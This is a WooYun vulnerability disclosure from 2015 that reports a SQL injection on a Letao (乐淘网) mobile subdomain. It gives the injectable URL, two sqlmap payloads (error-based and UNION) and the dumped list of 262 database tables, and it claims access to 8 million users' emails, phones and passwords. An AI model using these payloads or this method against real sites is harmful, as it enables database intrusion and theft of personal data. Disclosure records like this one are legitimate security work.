乐淘网某站SQL注入涉及800万用户信息 | wooyun-2015-0141381| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0141381

漏洞标题：乐淘网某站SQL注入涉及800万用户信息

漏洞作者：路人甲

提交时间：2015-09-15 19:31

修复时间：2015-09-20 19:32

公开时间：2015-09-20 19:32

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-09-15：细节已通知厂商并且等待厂商处理中
2015-09-20：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

乐淘网某站SQL注入涉及800万用户信息

详细说明：

注入点： http://wep.letao.com/wap/app_download.aspx?bid=12*&op=brand

涉及262张表

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: http://wep.letao.com:80/wap/app_download.aspx?bid=12 AND 9010=CONVERT(INT,(SELECT CHAR(113)+CHAR(122)+CHAR(112)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (9010=9010) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(107)+CHAR(98)+CHAR(113)))&op=brand
    Type: UNION query
    Title: Generic UNION query (NULL) - 8 columns
    Payload: http://wep.letao.com:80/wap/app_download.aspx?bid=12 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(122)+CHAR(112)+CHAR(113)+CHAR(113)+CHAR(104)+CHAR(108)+CHAR(86)+CHAR(83)+CHAR(109)+CHAR(70)+CHAR(72)+CHAR(112)+CHAR(119)+CHAR(112)+CHAR(113)+CHAR(113)+CHAR(107)+CHAR(98)+CHAR(113),NULL,NULL-- &op=brand
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NET
back-end DBMS: Microsoft SQL Server 2008
Database: letaoerp
[262 tables]
+------------------------------------+
| Addressee                          |
| BRAND_TECH                         |
| BRAND_TECH                         |
| CH_ACCOUNT_BALANCE                 |
| CH_BOX_ORDER_DETAIL                |
| CH_BOX_ORDER_DETAIL                |
| CH_LOG                             |
| CH_RETURN_ORDER_DETAIL             |
| CH_RETURN_ORDER_DETAIL             |
| CH_RETURN_ORDER_RECORD             |
| CH_SELL_ORDER_ADJUST               |
| CH_SELL_ORDER_ADJUST               |
| CH_SELL_ORDER_DETAIL               |
| CH_SELL_ORDER_RECORD               |
| CH_SELL_SCHEDULE_ORDER_DETAIL      |
| CH_SELL_SCHEDULE_ORDER_DETAIL      |
| CH_SHIP_ORDER_DETAIL               |
| CH_SHIP_ORDER_DETAIL               |
| CmsContent                         |
| Dealer                             |
| ERP_ADDR_AREA                      |
| ERP_ADDR_CITY                      |
| ERP_ADDR_PROVINCE                  |
| ERP_AD_DEFINE                      |
| ERP_AD_PLAN                        |
| ERP_ARTICLE_CONTENT                |
| ERP_ARTICLE_CONTENT                |
| ERP_ARTICLE_TYPE                   |
| ERP_BANK_BANK_CODE                 |
| ERP_BANK_BRANCH_LIST               |
| ERP_BANK_CITY_LIST                 |
| ERP_BAOSHENG_STOCK                 |
| ERP_CHANNEL_PROMOTION_TABLE        |
| ERP_COUPAN_BATCH                   |
| ERP_COUPAN_CAMPAIGN                |
| ERP_COUPAN_EXCEPTION               |
| ERP_COUPAN_RECORD                  |
| ERP_COUPAN_SECTION                 |
| ERP_COUPAN_USER_ALLOCATED          |
| ERP_COUPON_DANPINPAI_LIST          |
| ERP_COUPON_DANPIN_LIST             |
| ERP_CO_PAY_RECORD_ONLINE           |
| ERP_CO_REFUND_ORDER                |
| ERP_CO_REJECT_ORDER                |
| ERP_CUSTOMER                       |
| ERP_DEALER_PRODUCT_LIST            |
| ERP_DEALER_STOCK_EXCEPTION         |
| ERP_DEALER_STOCK_LIST              |
| ERP_DEFECT_WARE_DETAIL             |
| ERP_DEFECT_WARE_DETAIL             |
| ERP_EDM_BATCH_SEND                 |
| ERP_EDM_UNSUBSCRIBER               |
| ERP_EXPRESS_CONTRACT               |
| ERP_EXPRESS_FORM_DEFINE            |
| ERP_GIFT_CARD_DEFINE               |
| ERP_GIFT_CARD_RECORD               |
| ERP_INVENTORY_DIFFERENCE           |
| ERP_INVENTORY_DIFF_ADJUST          |
| ERP_INVENTORY_DIFF_ADJUST          |
| ERP_INVENTORY_RESULT2              |
| ERP_INVENTORY_RESULT2              |
| ERP_INVENTORY_SCAN                 |
| ERP_INVENTORY_TASK                 |
| ERP_IPHONE_MESSAGE                 |
| ERP_InvitePraise_For_TaoBao        |
| ERP_JOB                            |
| ERP_JUSHOU_INFO                    |
| ERP_KEYWORD_TRANSFER               |
| ERP_MARKET_LIBAO                   |
| ERP_MARKET_ORDERGIFT               |
| ERP_MARKET_PRODUCTGIFT             |
| ERP_MARKET_URL                     |
| ERP_MATERIAL_APPLY_DETAIL          |
| ERP_MATERIAL_APPLY_DETAIL          |
| ERP_MATERIAL_DEALER                |
| ERP_MATERIAL_ORDER                 |
| ERP_MATERIAL_PURCHASE_DETAIL       |
| ERP_MATERIAL_PURCHASE_DETAIL       |
| ERP_MATERIAL_STAT                  |
| ERP_MATERIAL_STOCK                 |
| ERP_MATERIAL_TRANSFER_DETAIL       |
| ERP_MATERIAL_TRANSFER_DETAIL       |
| ERP_MIAOSHA                        |
| ERP_MILK_API_LOG                   |
| ERP_MILK_APP_CONFIG                |
| ERP_MOBILE_CATEGORY_CMS            |
| ERP_MOBILE_MIAOSHA_V2_DETAIL       |
| ERP_MOBILE_MIAOSHA_V2_DETAIL       |
| ERP_MOBILE_MIAOSHA_V2_DETAIL       |
| ERP_MOBILE_SMS_BATCH_SEND          |
| ERP_MiniSite_CSS                   |
| ERP_MiniSite_PageSource            |
| ERP_MiniSite_Page_CSS              |
| ERP_MiniSite_Page_Script           |
| ERP_MiniSite_Script                |
| ERP_NEARESST_DELIVERY              |
| ERP_ONTHEHOUR_COUPAN               |
| ERP_OP_ITEM_LOCK                   |
| ERP_OP_ITEM_LOG                    |
| ERP_ORDER_NOTIFY_HISTORY           |
| ERP_ORDER_NOTIFY_HISTORY           |
| ERP_PHONE_LOG                      |
| ERP_PHONE_NAMELOG                  |
| ERP_PO_SHIP_ORDER_DETAIL           |
| ERP_PO_SHIP_ORDER_DETAIL           |
| ERP_PRICE_FORMULA                  |
| ERP_PRODUCT_CATEGORY_DEFINE        |
| ERP_PRODUCT_CHANGELOG              |
| ERP_PRODUCT_DISCOUNT_DEFINE        |
| ERP_PRODUCT_PRICE_MANAGER          |
| ERP_PRODUCT_PROPERTIES             |
| ERP_PRODUCT_PROPERTY_DEFINE        |
| ERP_PROD_PRICE_CHANGELOG           |
| ERP_PROMOTION_CATEGORY_LINK        |
| ERP_PROMOTION_CATEGORY_LINK        |
| ERP_PROMOTION_LIST                 |
| ERP_PROMOTION_PRICE_FORMULA        |
| ERP_PROMOTION_PRODUCT              |
| ERP_PURCHASE_DEFER_ORDER           |
| ERP_PURCHASE_IMG                   |
| ERP_PURCHASE_ORDER_DETAIL          |
| ERP_PURCHASE_ORDER_DETAIL          |
| ERP_ProductOnlyCode                |
| ERP_QQ_COUPAN_MAP_TABLE            |
| ERP_QUE_TUI_HUO_RECORD             |
| ERP_RECEIPT_ORIGINAL               |
| ERP_RESTORE                        |
| ERP_RETURN_BY_EXPRESS_DETAIL       |
| ERP_RETURN_BY_EXPRESS_DETAIL       |
| ERP_RETURN_BY_EXPRESS_PROVINCE     |
| ERP_RETURN_ORDER                   |
| ERP_RO_RESERVE_PROD_DETAIL         |
| ERP_SALES_ORDER_DETAIL             |
| ERP_SALES_ORDER_DETAIL             |
| ERP_SALES_PREDICTION_BASE          |
| ERP_SEM_KEYWORD_LIB                |
| ERP_SEM_PROD_SKU_LIST              |
| ERP_SEO_CHANEL_CLASS_URL           |
| ERP_SEO_CHANEL_LEXICON             |
| ERP_SEO_CHANEL_PAGE_CLASS          |
| ERP_SEO_CHANEL_PAGE_KEY            |
| ERP_SHIPPING_RECORD_DETAIL         |
| ERP_SHIPPING_RECORD_DETAIL         |
| ERP_SHOE_BRAND_SIZE_TABLE          |
| ERP_SITE_MESSAGE                   |
| ERP_SITE_TEMPLATE_CMS              |
| ERP_SO_BANKINFO                    |
| ERP_SO_BATCH                       |
| ERP_SO_DE_PRICE_DETAIL             |
| ERP_STOCK_MAIN                     |
| ERP_STOCK_PICKUP_FORM_DETAIL       |
| ERP_STOCK_PICKUP_FORM_DETAIL       |
| ERP_STOCK_PROD_MOVE_DETAIL         |
| ERP_STOCK_PROD_MOVE_DETAIL         |
| ERP_STOCK_RETURN_DEALER_FORM       |
| ERP_STOCK_RETURN_DEALER_RECORD     |
| ERP_STOCK_SHELF_DEFINE             |
| ERP_STOCK_TRANSFER                 |
| ERP_STOCK_UPC                      |
| ERP_STOCK_UPLOADSHELF_DETAIL       |
| ERP_STOCK_UPLOADSHELF_FORM         |
| ERP_ShippingTimeOutRule            |
| ERP_TALLY_DIFFERENCE               |
| ERP_TALLY_SCAN                     |
| ERP_TALLY_TASK_DETAIL              |
| ERP_TALLY_TASK_DETAIL              |
| ERP_TRANSFER_RULE                  |
| ERP_TUANGOU                        |
| ERP_Tie_Shoes_Method               |
| ERP_Tie_Shoes_Step                 |
| ERP_UNION_LMWL_LIB                 |
| ERP_UNION_LMWL_LIB                 |
| ERP_UNION_NOTITY                   |
| ERP_UNION_PRE_REGISTER             |
| ERP_UNION_STEP_RATIO               |
| ERP_USERS                          |
| ERP_USER_ADMIN_LOG                 |
| ERP_USER_BIND_UNION_TABLE          |
| ERP_USER_BLACKLIST                 |
| ERP_USER_COMMENT                   |
| ERP_USER_IP_RESTRICTION            |
| ERP_USER_LOGIN_LOG                 |
| ERP_USER_WUYOU_CARD_LOG            |
| ERP_USER_WUYOU_CARD_LOG            |
| ERP_WAREHOUSE_PART                 |
| ERP_WAREHOUSE_PRINTER_SETTING      |
| ERP_WEIBO_ERROR                    |
| ERP_WEIBO_KEYWORD                  |
| ERP_WEIBO_MESSAGE_LOG              |
| ERP_WEIBO_MESSAGE_LOG              |
| ERP_WORK_ORDER_BEFOREREFUND_DETAIL |
| ERP_WORK_ORDER_BEFOREREFUND_DETAIL |
| ERP_WORK_ORDER_CALLIN_DETAIL       |
| ERP_WORK_ORDER_DETAIL              |
| ERP_WORK_ORDER_EXPRESS             |
| ERP_WORK_ORDER_LOG                 |
| ERP_WORK_ORDER_PHONE_LOG           |
| ERP_WORK_ORDER_PORC_DETAIL         |
| ERP_WORK_ORDER_RETURN_DETAIL       |
| ERP_WORK_ORDER_STAFF_ONLINE_LOG    |
| ERP_WORK_ORDER_TYPE_TIME_SET       |
| ERP_WORK_ORDER_UNUSUAL_DETAIL      |
| ERP_WORK_ORDER_UPGRADE_DETAIL      |
| ERP_WORK_ORDER_UPGRADE_STAT_DETAIL |
| ERP_WorkOrder_Group_Member         |
| ERP_WorkOrder_Group_Member         |
| EXPRESS_COMPANY_USER               |
| EXPRESS_DISTRIBUTE_RULE            |
| Erp_tie_shoes_posterDes            |
| ExpressCompany                     |
| FREE_TUAN_ORDER_DETAIL             |
| FREE_TUAN_ORDER_FORM               |
| INVOICE_PRINT                      |
| INVOICE_PRINT                      |
| Image                              |
| ORDER_COUPAN_RELATIONS             |
| OrderDetail                        |
| OrderForm                          |
| OrderStatus                        |
| PRODUCT_BRAND_TECH_MAP             |
| PRODUCT_BRAND_TECH_MAP             |
| PROMO_SETTING                      |
| Payments                           |
| Po_Detail                          |
| ProdComment                        |
| ProductPresellDetail               |
| ProductPresellDetail               |
| Product_Style                      |
| PurChase_Order                     |
| SHIPPING_EXPENSE_RULE              |
| SHIPPING_EXPENSE_RULE              |
| SHIP_ORDER_DETAIL                  |
| SITE_SOURCE_BIND_TALBE             |
| STOCK_BASE                         |
| STOCK_LOG                          |
| Shipping_Order                     |
| Storehouse                         |
| Third_Part_Logistics_Cost          |
| Third_Part_Order_Syn               |
| Third_Part_Sales_Prom_Detail       |
| Third_Part_Sales_Prom_Detail       |
| Third_Part_Sales_Prom_Log          |
| Third_Part_Shop_Product            |
| Transfer                           |
| UNION_PAPERS_IMG                   |
| UNION_PROMOTION                    |
| UN_Member                          |
| UN_S_Member                        |
| UN_School                          |
| USER_BLACKLIST                     |
| USER_UNION_BIND_TABLE              |
| UnionIp                            |
| Union_Keys                         |
| UserCMS                            |
| Users                              |
| VIRTUAL_ACCOUNT_DETAIL             |
| VIRTUAL_ACCOUNT_DETAIL             |
| aa_neigou                          |
| erp_temp_order_commetnt            |
| erp_temp_product                   |
| erp_temp_users                     |
| sysdiagrams                        |
+------------------------------------+

800万用户

包含邮箱、手机、姓名、用户名、密码等字段

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2015-09-20 19:32

厂商回复：

漏洞Rank：15 (WooYun评价)

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0141381

漏洞标题：乐淘网某站SQL注入涉及800万用户信息

相关厂商：乐淘网

漏洞作者：路人甲

提交时间：2015-09-15 19:31

修复时间：2015-09-20 19:32

公开时间：2015-09-20 19:32

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0141381

漏洞标题：乐淘网某站SQL注入涉及800万用户信息

相关厂商：乐淘网

漏洞作者： 路人甲

提交时间：2015-09-15 19:31

修复时间：2015-09-20 19:32

公开时间：2015-09-20 19:32

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0141381"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云